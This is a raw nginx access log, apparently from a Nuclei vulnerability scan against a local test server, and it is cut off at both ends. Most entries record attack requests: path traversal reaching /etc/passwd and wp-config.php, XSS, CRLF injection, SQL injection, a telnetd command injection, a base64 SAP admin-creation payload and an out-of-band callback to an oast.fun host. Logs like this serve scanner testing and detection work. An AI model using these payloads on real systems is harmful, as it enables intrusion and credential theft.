http://c9v8h8gsmpv8c1qg07h0ccxxm6pmrpgw9.oast.fun\x22)","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/mobile/ HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.004","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /http_header.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.223","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc\x0D\x0A CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\x0D\x0AuserDetails","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.219","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cache/backup/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/icf/logoff?redirecturl=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /community/?foro=signin&redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /session HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url=http://127.0.0.1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\x22R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\x22))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"{\x22Password\x22:\x22297MTsHEoxSXVJsqpGoRzCikKT1\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"PATCH", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/index.php?db=information_schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owncloud/config/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/external/7.0/system.System.get_infos HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.077","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0DSet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.219","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"{\x22UserName\x22:\x22Administrator\x22,\x22Password\x22:\x22297MTsHEoxSXVJsqpGoRzCikKT1\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /redfish/v1/SessionService/Sessions/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET .//WEB-INF/weblogic.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET .//WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/index.php?db=information_schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authentication/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.217","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configuration.php-dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/user/picker?query= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", 